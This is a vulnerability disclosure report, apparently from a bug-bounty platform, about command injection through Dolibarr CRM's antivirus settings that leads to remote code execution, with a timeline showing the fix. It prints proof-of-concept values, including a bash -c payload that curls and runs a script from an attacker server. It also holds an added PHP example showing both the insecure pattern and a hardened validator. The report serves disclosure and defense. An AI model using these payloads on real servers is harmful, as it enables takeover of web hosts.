ANTIVIRUS Command Improper Input Validation leads to Remote Code Execution in dolibarr/dolibarr

Status: Valid

Reported on Feb 2nd 2023
Description

In the Security setup page, Dolibarr CRM lets an authenticated user configure an antivirus command (MAIN_ANTIVIRUS_COMMAND) and its parameters (MAIN_ANTIVIRUS_PARAM) that are run against uploaded files. Because neither value is validated before it is handed to the shell, a malicious user with access to that page can set them to an arbitrary command and obtain Remote Code Execution on the web server.

PoC and Exploit 1

  • PoC 1: First upload a malicious .py file (the application accepts .py uploads), then set MAIN_ANTIVIRUS_COMMAND=bash and MAIN_ANTIVIRUS_PARAM=-c 'python3 {fileName_uploaded_path}'. The next time Dolibarr invokes the antivirus command, bash runs the uploaded script instead of a scanner.
  • Attachments: PoC_1_Video, PoC_1_exploit

PoC and Exploit 2

  • PoC 2: Execute a script served from an attacker-controlled web server by setting MAIN_ANTIVIRUS_COMMAND=bash and MAIN_ANTIVIRUS_PARAM=-c "$(curl {ATTACKER_WEB_SERVER})". The command substitution fetches the attacker's script and bash executes it, so no file upload is required.
  • Attachments: PoC_2_Video, PoC_2_exploit

Impact

This vulnerability leads to Remote Code Execution on the web server, with the privileges of the web server process that runs the antivirus command.

Occurrences

Improper validation and filtering of the MAIN_ANTIVIRUS_PARAM (and MAIN_ANTIVIRUS_COMMAND) settings before they are passed to the shell, in antivir.class.php.
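The missing validation described above, as an added example in PHP that is not Dolibarr's own code and not the fix from the commit referenced later in this report: a minimal scan wrapper that builds the command the insecure way (plain concatenation into a shell string, which is exactly what both PoCs abuse) beside a hardened version that validates both settings before anything reaches the shell. The function names, the $conf array, the sample paths and the interpreter denylist are assumptions made for this example.

```php
<?php
// Added example, not Dolibarr's own code. Function names, the $conf array,
// the sample paths and the interpreter denylist are assumptions for illustration.

// Insecure pattern: both settings are trusted and concatenated into a shell string.
// With MAIN_ANTIVIRUS_COMMAND=bash and MAIN_ANTIVIRUS_PARAM=-c '...' (PoC 1) or
// -c "$(curl ...)" (PoC 2), the "scanner" is a shell running attacker-chosen code.
function scanFileInsecure(array $conf, string $filepath): int
{
    $cmd = $conf['MAIN_ANTIVIRUS_COMMAND'] . ' ' . $conf['MAIN_ANTIVIRUS_PARAM'] . ' ' . $filepath;
    exec($cmd, $output, $ret);
    return $ret;
}

// Returns a list of validation errors; an empty list means the settings are acceptable.
function validateAntivirusSettings(string $command, string $param): array
{
    $errors = [];

    // The scanner must be an absolute path to an existing executable, not a bare word
    // resolved through PATH and not a relative path inside the web root.
    if ($command === '' || $command[0] !== '/' || !is_executable($command)) {
        $errors[] = 'MAIN_ANTIVIRUS_COMMAND must be an absolute path to an executable';
    }

    // Refuse shells and interpreters outright: with those, any parameter is code.
    $interpreters = ['sh', 'bash', 'dash', 'zsh', 'ksh', 'python', 'python3', 'perl', 'php', 'ruby', 'node'];
    if (in_array(basename($command), $interpreters, true)) {
        $errors[] = 'MAIN_ANTIVIRUS_COMMAND must point at a scanner, not a shell or interpreter';
    }

    // Parameters may only contain a conservative character set: no quotes, $, backticks,
    // (), ;, |, &, <, > or newlines, so no token can become a shell construct.
    if (!preg_match('/^[A-Za-z0-9 _.,=:\/-]*$/', $param)) {
        $errors[] = 'MAIN_ANTIVIRUS_PARAM contains characters that are not allowed';
    }

    return $errors;
}

// Hardened pattern: validate first, then tokenise the parameters and escape every
// token and the file path individually so the shell sees fixed, literal arguments.
function scanFileHardened(array $conf, string $filepath): array
{
    $errors = validateAntivirusSettings($conf['MAIN_ANTIVIRUS_COMMAND'], $conf['MAIN_ANTIVIRUS_PARAM']);
    if ($errors !== []) {
        return ['ok' => false, 'errors' => $errors];
    }

    $parts = [escapeshellarg($conf['MAIN_ANTIVIRUS_COMMAND'])];
    foreach (preg_split('/\s+/', trim($conf['MAIN_ANTIVIRUS_PARAM']), -1, PREG_SPLIT_NO_EMPTY) as $token) {
        $parts[] = escapeshellarg($token);
    }
    $parts[] = escapeshellarg($filepath); // the uploaded file name is user-controlled too
    $cmd = implode(' ', $parts);

    exec($cmd, $output, $ret);
    return ['ok' => true, 'cmd' => $cmd, 'ret' => $ret, 'output' => $output];
}

// Constructed inputs: the two PoC configurations from this report and a sane one.
$cases = [
    'PoC 1' => ['MAIN_ANTIVIRUS_COMMAND' => 'bash', 'MAIN_ANTIVIRUS_PARAM' => "-c 'python3 /var/www/documents/upload.py'"],
    'PoC 2' => ['MAIN_ANTIVIRUS_COMMAND' => 'bash', 'MAIN_ANTIVIRUS_PARAM' => '-c "$(curl http://attacker.example/x.sh)"'],
    'sane'  => ['MAIN_ANTIVIRUS_COMMAND' => '/usr/bin/clamscan', 'MAIN_ANTIVIRUS_PARAM' => '--no-summary --stdout'],
];
foreach ($cases as $name => $conf) {
    $errors = validateAntivirusSettings($conf['MAIN_ANTIVIRUS_COMMAND'], $conf['MAIN_ANTIVIRUS_PARAM']);
    echo $name, ': ', ($errors === [] ? 'accepted' : implode('; ', $errors)), PHP_EOL;
}
// The 'sane' case is only accepted on a host where /usr/bin/clamscan actually exists.
```

The point of the hardened version is that escaping alone is not a fix here: once the configured command is itself a shell, every parameter is code no matter how it is quoted, so the command has to be restricted to a real scanner binary and the parameters to a character set that cannot form a shell construct. The allowlist regex is deliberately tight and may need widening for a given scanner's options. Separately, whoever can edit these two settings is effectively trusted with code execution on the host, so the Security setup page itself should be limited to administrators.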

Timeline

We are processing your report and will contact the dolibarr team within 24 hours. (a year ago)
blakduk modified the report. (a year ago)
We have contacted a member of the dolibarr team and are waiting to hear back. (a year ago)

blakduk (Researcher), a year ago:

Hi @admin, It seems that the maintainer acknowledged this vulnerability and fixed it but he did not update the status of this report (https://github.com/Dolibarr/dolibarr/commit/954906ec4835e505806a51527a16e6648f618c0a)

Laurent Destailleur validated this vulnerability. (a year ago)
blakduk has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
Laurent Destailleur marked this as fixed in 18.0 with commit 61c734. (a year ago)
Laurent Destailleur has been awarded the fix bounty.
antivir.class.php#L177 has been validated.
This vulnerability has now been published. (25 days ago)